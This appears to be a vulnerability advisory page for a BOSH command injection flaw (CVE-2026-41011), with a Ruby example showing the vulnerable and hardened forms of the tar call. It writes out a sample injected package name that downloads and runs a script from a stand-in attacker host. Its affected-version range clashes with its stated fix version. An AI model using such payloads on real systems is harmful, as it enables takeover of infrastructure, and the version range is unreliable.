CVE-2026-41011
Description
BOSH command injection vulnerability allows authenticated attackers to execute arbitrary commands via crafted package names.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
PackagePersister.validate_tgz in BOSH versions prior to v282.1.12 is vulnerable to command injection. The name parameter, derived from release.MF within an uploaded tarball, is used to construct a tar -tf command executed via /bin/sh -c without proper shell escaping. The validation for package names occurs too late in the create_package process, after the vulnerable shell command is executed [1].
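The pattern described above (untrusted name interpolated into a string handed to `/bin/sh -c`, with validation running only afterwards) is easiest to see next to its hardened form: validate first, then execute without a shell. The following Ruby is an added illustration written for this page, not BOSH's source; `vulnerable_tar_command`, `safe_tar_argv`, `list_package_contents`, the `PACKAGE_NAME_RE` allow-list and the constructed sample names are all assumptions for the example, not the project's own identifiers or rules.

```ruby
require 'open3'

# Reconstructed shape of the vulnerable pattern (illustration only, not BOSH's code):
# the package name is interpolated into a single string that `sh -c` then parses,
# so shell metacharacters in the name are interpreted as command syntax.
def vulnerable_tar_command(name, release_dir)
  "tar -tf #{release_dir}/packages/#{name}.tgz"
end

# Allow-list for package names. This policy is an assumption for the example;
# the point is that it is checked *before* any command is built.
PACKAGE_NAME_RE = /\A[A-Za-z0-9][A-Za-z0-9_.-]*\z/

def valid_package_name?(name)
  name.is_a?(String) && PACKAGE_NAME_RE.match?(name)
end

# Hardened form: reject anything outside the allow-list up front, then build an
# argv array. Open3.capture2 with multiple arguments execs the program directly,
# so no shell ever sees the name and metacharacters stay literal bytes.
def safe_tar_argv(name, release_dir)
  raise ArgumentError, "invalid package name: #{name.inspect}" unless valid_package_name?(name)
  ['tar', '-tf', File.join(release_dir, 'packages', "#{name}.tgz")]
end

# Lists the tarball's entries using the argv form. Returns an array of entry names.
def list_package_contents(name, release_dir)
  argv = safe_tar_argv(name, release_dir)
  out, status = Open3.capture2(*argv)
  raise "tar failed with status #{status.exitstatus}" unless status.success?
  out.lines.map(&:chomp)
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample names: one benign, one carrying shell metacharacters.
  puts vulnerable_tar_command('x;id #', '/tmp/rel')   # shell would run `id` here
  puts safe_tar_argv('nginx', '/tmp/rel').inspect     # ["tar", "-tf", ".../nginx.tgz"]
  begin
    safe_tar_argv('x;id #', '/tmp/rel')
  rescue ArgumentError => e
    puts "rejected before any command ran: #{e.message}"
  end
end
```

The ordering is the whole fix: a name check that runs after `tar -tf` has already been executed through a shell is not a control, whereas the argv form is safe even if the allow-list were loosened, because nothing parses the string as shell.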
Exploitation
An attacker with bosh.releases.upload or bosh.admin privileges can craft a release tarball. This tarball would contain a release.MF file specifying a malicious package name, such as x;curl attacker.example/s|sh #. When this release is uploaded, the validate_tgz function will execute the crafted command, leading to arbitrary command execution [1].
Impact
Successful exploitation allows an attacker to execute arbitrary commands on the BOSH director with the privileges of the bosh user. This can lead to a full compromise of the director and any managed infrastructure [1].
Mitigation
Users of affected BOSH versions should upgrade to v282.1.12 or later. This fix was released on or before June 4th, 2026 [1].
AI Insight generated on Jun 4, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: <=v282.1.12
Patches
No patches discovered yet.
Vulnerability mechanics
No source-code context for this CVE — mechanics are only generated when we can read the actual fix diff. Without that, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.
References
News mentions
No linked articles in our index yet.